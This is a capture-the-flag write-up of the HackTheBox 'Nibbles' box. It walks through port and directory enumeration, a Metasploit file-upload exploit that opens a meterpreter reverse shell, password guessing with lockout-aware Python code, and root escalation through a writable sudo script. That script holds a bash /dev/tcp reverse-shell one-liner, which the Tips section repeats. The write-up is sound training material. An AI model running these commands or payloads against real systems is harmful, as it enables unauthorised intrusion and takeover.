Nibbles

Created: Mar 1, 2024 04:57 PM
Updated: Last updated March 1, 2024
Tags: Sudo Exploitation, CVE, Penetration Tester Level 1
Attachments: none
Difficulty: EASY
⚠️ Disclaimer: the techniques, ideas and tools in this article are provided solely for security-minded learning and exchange. If you do not agree, close this page! Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences.

ℹ️ Target information


🔍 Port scan

┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ sudo nmap -sS -p- --max-retries=0 10.10.10.75 -oN allports.txt -oX allports.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:06 CST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.75 (10.10.10.75)
Host is up (0.28s latency).
Not shown: 57242 closed tcp ports (reset), 8291 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 92.34 seconds

Note that --max-retries=0 makes the scan fast but turns every lost probe into a "filtered (no-response)" port; 8291 of them here on a 0.28s link. If the follow-up service scan looks thin, rerun the full-port scan without that flag before concluding only 22 and 80 are open.
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.10.10.75 -Pn -oN nmap.txt -oX nmap.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:12 CST
Nmap scan report for 10.10.10.75 (10.10.10.75)
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds
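The -p $(...) pipeline above is a fair amount of cut/tr/sed just to read the open ports back out of allports.txt. As an added example (not part of the original writeup), here is the same extraction as a small Python parser for nmap's normal (-oN) output. The sample scan text is constructed to mirror the scan above, with one extra made-up line (8080/tcp filtered) so the filtered-port count has something to find:

```python
import re
from typing import List, Tuple

# Constructed sample of `nmap -oN` output, modelled on the allports.txt scan
# above. The 8080/tcp line is invented to show how a filtered port is reported.
SAMPLE_ALLPORTS = """\
# Nmap 7.92 scan initiated Thu Apr  7 14:06:00 2022 as: nmap -sS -p- --max-retries=0 -oN allports.txt 10.10.10.75
Warning: 10.10.10.75 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.75 (10.10.10.75)
Host is up (0.28s latency).
Not shown: 57242 closed tcp ports (reset), 8291 filtered tcp ports (no-response)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
8080/tcp filtered http-proxy
# Nmap done at Thu Apr  7 14:07:32 2022 -- 1 IP address (1 host up) scanned in 92.34 seconds
"""

# A port line in normal output looks like "22/tcp open ssh" (columns padded with spaces).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, protocol, state, service) for every port line in -oN output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def open_ports(text: str, proto: str = "tcp") -> List[int]:
    """Open ports only, sorted, for one protocol."""
    return sorted({p for p, pr, state, _ in parse_ports(text) if pr == proto and state == "open"})


def port_arg(text: str) -> str:
    """The comma-separated value handed to `nmap -p`, replacing the cut/tr/sed pipeline."""
    return ",".join(str(p) for p in open_ports(text))


def filtered_count(text: str) -> int:
    """Ports nmap gave up on: explicit 'filtered' lines plus the 'Not shown' summary.

    With --max-retries=0 every lost probe lands here, so a large number means
    the open-port list may be incomplete and the scan deserves a retry."""
    listed = sum(1 for _, _, state, _ in parse_ports(text) if state == "filtered")
    m = re.search(r"(\d+) filtered tcp ports", text)
    return listed + (int(m.group(1)) if m else 0)


if __name__ == "__main__":
    print("open:", port_arg(SAMPLE_ALLPORTS), "filtered:", filtered_count(SAMPLE_ALLPORTS))
```

Feed the real allports.txt to port_arg() and pass the result to -p; filtered_count() is the sanity check that tells you whether the quick scan dropped too many probes to trust.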
 

🤔 Intelligence analysis

Port 80 is open, so start with the web application and see later whether SSH becomes useful.

Visit the web page

Continue on to the /nibbleblog/ directory

Clicking through every link turns up nothing useful, so enumerate directories and files.
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/07 14:18:34 Starting gobuster in directory enumeration mode
===============================================================
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
Progress: 121 / 81644 (0.15%)
[ERROR] 2022/04/07 14:18:46 [!] Get "http://10.10.10.75/nibbleblog/warez": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
Progress: 2405 / 81644 (2.95%)
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,html,txt,sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2022/04/07 14:20:29 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402]
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php             (Status: 200) [Size: 302]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
Progress: 2135 / 408220 (0.52%)
Both an admin directory and admin.php show up; open each of them.

admin.php presents a login form. The usual "universal password" SQL-injection bypass payloads do not get in.

So search for known vulnerabilities in this blog engine.
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ searchsploit nibbleblog
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
----------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                           | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)            | php/remote/38489.rb
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Mirror the exploit file and read it
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ searchsploit -m php/remote/38489.rb
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
  Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
      URL: https://www.exploit-db.com/exploits/38489
     Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
File Type: Ruby script, ASCII text

Copied to: /home/liona/Workspace/HTB/Nibbles/38489.rb
The second entry is a Metasploit module. Load it in msf and check which options and information it needs.
msf6 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.75      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nibbleblog/     yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.26      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3
It needs a username and password. Where would those come from? The blog engine is very likely open source, so look at its GitHub repository.

The repository contains an install.php; request it on the target.

It offers an Update button; try it.
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.75/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>
No credentials in there, but the file lives at /nibbleblog/content/private/config.xml, and a directory named private is exactly where sensitive files would be. Request the directory itself and see whether Apache lists it: http://10.10.10.75/nibbleblog/content/private/

It does, and the listing looks promising. Opening the files, though, gives no credentials.

What it does give is a blacklist: an IP-ban policy. The brute forcing that came later confirmed that it is a blacklist of addresses that have failed password attempts, so every wrong guess counts against you.

In the end the only ways in were brute force or guessing. The password is the box name: nibbles
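The guessing step above is where the blacklist bites: every wrong password counts against the source address, so the order of guesses matters more than the size of the wordlist. The following is an added example, not the author's tooling. It builds candidates from the strings config.xml leaked (site name, slogan, admin e-mail), spends the plain words before any suffix round, and aborts at the first sign of a lockout instead of burning the rest of the list. FakeAdminLogin is a hypothetical stand-in for admin.php with a made-up failure threshold; against the real target you would replace its login method with an HTTP POST to admin.php and map the response to True, False or None.

```python
import time
from typing import Callable, Iterable, List, Optional, Tuple

# Strings lifted from the config.xml shown above; everything derived from them is a guess.
SEEDS = ("Nibbles", "Yum yum", "admin@nibbles.com")


def context_wordlist(seeds: Iterable[str],
                     suffixes: Iterable[str] = ("", "1", "123", "!", "2017", "2018")) -> List[str]:
    """Turn site-specific strings into password candidates.

    All bare variants come first, then one round per suffix, so the likeliest
    guesses are tried before a lockout can trigger."""
    base = set()
    for s in seeds:
        s = s.strip()
        if not s:
            continue
        squashed = s.replace(" ", "")
        base.update({s, s.lower(), s.capitalize(), squashed, squashed.lower(),
                     s.split("@")[0]})      # local part of an e-mail address
    words = sorted(base, key=lambda w: (len(w), w))   # short, simple words first
    out, seen = [], set()
    for suf in suffixes:
        for w in words:
            cand = w + suf
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


class Lockout(Exception):
    """Raised when the target starts refusing attempts (source blacklisted)."""


def guess_password(candidates: Iterable[str],
                   attempt: Callable[[str], Optional[bool]],
                   delay: float = 0.0) -> Optional[str]:
    """Try candidates in order and stop at the first lockout.

    `attempt` returns True on success, False on a wrong password and None when
    the target reports the source as blacklisted; `delay` spaces attempts out."""
    for pw in candidates:
        result = attempt(pw)
        if result is True:
            return pw
        if result is None:
            raise Lockout(f"target blacklisted us after trying {pw!r}")
        if delay:
            time.sleep(delay)
    return None


def run_attack(candidates: Iterable[str],
               attempt: Callable[[str], Optional[bool]],
               delay: float = 0.0) -> Tuple[str, Optional[str]]:
    """Verdict wrapper: ('found', pw), ('locked', reason) or ('exhausted', None)."""
    try:
        pw = guess_password(candidates, attempt, delay)
    except Lockout as e:
        return ("locked", str(e))
    return ("found", pw) if pw is not None else ("exhausted", None)


class FakeAdminLogin:
    """Hypothetical stand-in for admin.php: counts wrong passwords and, after
    `max_fail` of them, treats the source as blacklisted (threshold is made up)."""

    def __init__(self, password: str, max_fail: int = 4):
        self.password = password
        self.max_fail = max_fail
        self.fail_count = 0
        self.blacklisted = False

    def login(self, pw: str) -> Optional[bool]:
        if self.blacklisted:
            return None          # the real site would answer with its ban page
        if pw == self.password:
            return True
        self.fail_count += 1
        if self.fail_count >= self.max_fail:
            self.blacklisted = True
        return False


if __name__ == "__main__":
    wordlist = context_wordlist(SEEDS)
    target = FakeAdminLogin("nibbles", max_fail=10)
    print(run_attack(wordlist, target.login), "after", target.fail_count, "failures")
```

With these seeds the bare word "nibbles" is the sixth candidate, so it lands well inside a small failure budget; with a stricter threshold the loop stops with a "locked" verdict rather than feeding the blacklist for nothing.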
Log in to admin.php as admin:nibbles

Login succeeds. Enter the credentials in msf and run the exploit.
msf6 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nibbles          yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.75      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nibbleblog/     yes       The base path to the web application
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.26      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3
msf6 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.26:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.75:54648 ) at 2022-04-07 15:35:35 +0800

meterpreter > shell
Process 1662 created.
Channel 0 created.
ls
db.xml
python3 -c "import pty;pty.spawn('/bin/bash')"
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd
cd
bash: cd: HOME not set
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
<ml/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ ls
ls
nibbler
nibbler@Nibbles:/home$

💥 Exploitation

Get user.txt

nibbler@Nibbles:/home$ cat nibbler/user.txt
cat nibbler/user.txt
1b6b5c5ccce562645c87ce3738adb27c
nibbler@Nibbles:/home$

Get root.txt

Check sudo permissions
nibbler@Nibbles:/home$ sudo
sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
nibbler@Nibbles:/home$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home$
sudo is available: nibbler may run /home/nibbler/personal/stuff/monitor.sh as root without a password.

Look at the contents of /home/nibbler/personal/stuff/monitor.sh

nibbler@Nibbles:/home$ cat /home/nibbler/personal/stuff/monitor.sh
cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory

The file does not exist, and it sits inside nibbler's own home directory. sudo only matches on the path, so whatever we create there runs as root. Let's do that.
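The check that matters in this privesc is not just whether the sudo target exists, but who can write it or create it. Below is an added example (not from the writeup) that parses sudo -l output and classifies each NOPASSWD target as writable, absent but creatable because the nearest existing ancestor directory is writable, or fixed. SUDO_L is the output above embedded as a string, and make_fake_tree builds a scratch directory tree standing in for the box so the check runs offline; on a real host you would call triage_command with the default empty root, which is the same test `ls -ld` on the path and its parents would give you.

```python
import os
import re
import tempfile
from typing import Dict, List

# `sudo -l` output copied from the session above, embedded here for offline use.
SUDO_L = r"""Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(root) NOPASSWD: /path" -> run-as spec, tag list (SETENV:, NOPASSWD: may stack), command.
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Extract the command rules that follow the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "cmd": m.group("cmd").strip()})
    return rules


def triage_command(cmd: str, root: str = "") -> str:
    """Classify what we can do with a sudo target.

    'writable'                exists and we can edit it
    'missing-parent-writable' absent, but we can create it
    'missing'                 absent and no writable ancestor
    'fixed'                   exists and is read-only for us
    'not-a-path'              ALL or a bare command name
    `root` prefixes every path so the check can run against a scratch tree."""
    path = cmd.split()[0]           # drop any argument restriction
    if not path.startswith("/"):
        return "not-a-path"
    full = root + path
    if os.path.exists(full):
        return "writable" if os.access(full, os.W_OK) else "fixed"
    parent, stop = os.path.dirname(full), (root or "/")
    while not os.path.exists(parent) and len(parent) > len(stop):
        parent = os.path.dirname(parent)   # climb to the nearest existing ancestor
    if os.path.isdir(parent) and os.access(parent, os.W_OK):
        return "missing-parent-writable"
    return "missing"


def exploitable(text: str, root: str = "") -> List[Dict[str, object]]:
    """Rules that run as root, need no password and point at something we control."""
    hits = []
    for rule in parse_sudo_l(text):
        verdict = triage_command(str(rule["cmd"]), root)
        if rule["runas"] == "root" and rule["nopasswd"] and verdict in ("writable", "missing-parent-writable"):
            hits.append({**rule, "verdict": verdict})
    return hits


def make_fake_tree(existing_dirs=("home/nibbler",), existing_files=()) -> str:
    """Scratch filesystem mirroring the box: the home exists, personal/stuff does not."""
    root = tempfile.mkdtemp(prefix="nibbles-")
    for rel in existing_dirs:
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    for rel in existing_files:
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        open(p, "w").close()
    return root


if __name__ == "__main__":
    tree = make_fake_tree()
    for hit in exploitable(SUDO_L, root=tree):
        print(hit["verdict"], hit["cmd"])
```

A "fixed" verdict is not the end of the road either: the script's own contents still need reading for relative binary calls or writable files it sources, although the secure_path in the Defaults above already closes the plain PATH-hijack route.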
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ cat monitor.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.26/1234 0>&1

┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget
wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.26/monitor.sh
<er/personal/stuff$ wget http://10.10.14.26/monitor.sh
--2022-04-07 03:44:02--  http://10.10.14.26/monitor.sh
Connecting to 10.10.14.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54 [text/x-sh]
Saving to: 'monitor.sh'

monitor.sh          100%[===================>]      54  --.-KB/s    in 0s

2022-04-07 03:44:03 (10.5 MB/s) - 'monitor.sh' saved [54/54]

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh

┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:49884.
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
cat /root/root.txt
e76c7db9651f7bd5505025ad296d2a35
root@Nibbles:/home/nibbler/personal/stuff#

📝 Summary

The hardest part of this box is the admin credentials. There is no clean way to derive them: you either guess (the box name works) or brute force, and the blacklist punishes the latter 😔

Knowledge points

  • Directory brute-forcing with gobuster

Tips

  • Get a full PTY with Python: python3 -c "import pty;pty.spawn('/bin/bash')"
  • Bash reverse shell: bash -i >& /dev/tcp/10.10.14.26/1234 0>&1

References

  1. https://cn-sec.com/archives/455404.html
  2. https://www.bilibili.com/video/BV1uL4y1t7kV